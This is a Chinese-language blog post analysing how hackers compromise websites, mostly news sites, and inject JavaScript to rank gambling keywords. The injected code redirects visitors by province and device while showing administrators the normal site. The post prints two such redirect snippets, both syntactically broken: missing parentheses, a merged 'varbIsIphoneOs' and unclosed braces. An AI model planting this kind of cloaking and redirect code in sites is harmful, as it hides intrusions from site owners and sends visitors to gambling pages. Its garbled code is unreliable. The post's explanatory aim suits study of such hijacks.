菠菜关键词排名技术深入分析某网站被黑客入侵
随着菠菜行业的高速发展和暴利诱惑,很多小的黑客团体纷纷加入海外菠菜公司,为他们做关键词排名,其实如果仔细分析这个行业还是有很多有意思的东西的,今天有个朋友给我发了一个菠菜排名案例,让我帮忙分析一下。
娱乐世界
今天的案例中黑客们用到的是网站劫持技术,可能很多从事白帽seo行业的朋友们对网站劫持还不是很了解,我就在开篇之前为大家先简单介绍一下“网站劫持”技术的应用。首先黑客们会先找到目标网站,一般都是新闻站居多,因为新闻类型的网站发布内容搜索引擎基本上都是秒收录,当黑客成功入侵目标站之后会在其网站首页插入js劫持代码或者修改其配置文件,再增加相应的劫持代码,到这里劫持功能就实现了,但是很多手段稍微高明一点的黑客还会加入判断条件,比如分地域跳转,分ip跳转。另外被劫持的网站搜索引擎爬虫抓取的时候抓取到的其实就是黑客们预先设置好的菠菜关键词内容,人工从表面看还是原来正常的网站,但是查看源代码就会发现端倪,有的通过首页劫持代码实现,有的则是通过js调用判断等。而且现在菠菜业已经做的很专业了,还判断你是pc浏览器还是移动浏览器而跳转到不同的自适应页面。
大家可能有的朋友以前也遇到过你打开一个网站看到的是菠菜内容,但是你把该网站发给另外一个省份的朋友去看,他看到的却跟你不一样,这就是黑客对跳转做了判断ip归属地跳转,黑客之所以这样做应该是对网站管理员的登录ip省份做了判断处理,如果是该网站管理员所在的省份打开网站就是一个正常的网站,但是别的地区的人打开都会跳转到菠菜站。可能我表述的不够清楚,我给大家举个小例子看看吧。
比如黑客找到网站管理员的ip为江西,那么黑客就会将该地区访问时的内容做一个判断,除江西之外的地方就又是一个判断,只不过前者打开是正常的网站,后者打开会跳转到菠菜站,比如该网站是:www.toutiao.com,那么江西省的人打开看到的就还是www.toutiao.com【正常网站】,但是江西省之外的人打开就会跳转到wwww.baidu.com【假想这个网站是个菠菜站】,接下来我来给大家演示一下上边说的两种情况:
var jump_myt = setInterval(function{
if(remote_ip_info) {
clearInterval(jump_myt);
if(remote_ip_info.province == '江西' ||remote_ip_info.province == '安徽'||remote_ip_info.city =='北京'||remote_ip_info.city == '北京') {
window.location.href= 'http://www.toutiao.com';
}
else{
window.location= 'http://www.baidu.com';
}
}
如果相应的user-agent匹配关键字ipad、iphone os、midp、ucweb、android等移动端设备时则会跳转到http://www.baidu.com【假想这个站是菠菜站】这个菠菜站点,一般黑客们要实现这个功能,代码写法如下:
function browserRedirect {
var sUserAgent=navigator.userAgent.toLowerCase;
var bIsIpad=sUserAgent.match(/ipad/i) == "ipad";
varbIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os";
var bIsMidp=sUserAgent.match(/midp/i) == "midp";
var bIsUc7=sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4";
var bIsUc=sUserAgent.match(/ucweb/i) == "ucweb";
var bIsAndroid=sUserAgent.match(/android/i) == "android";
var bIsCE=sUserAgent.match(/windows ce/i) == "windows ce";
var bIsWM=sUserAgent.match(/windows mobile/i) == "windows mobile";
if (bIsIpad ||bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) {
window.location.href='http://www.baidu.com/';
} else {
window.location='http://www.baidu.com';
}
}
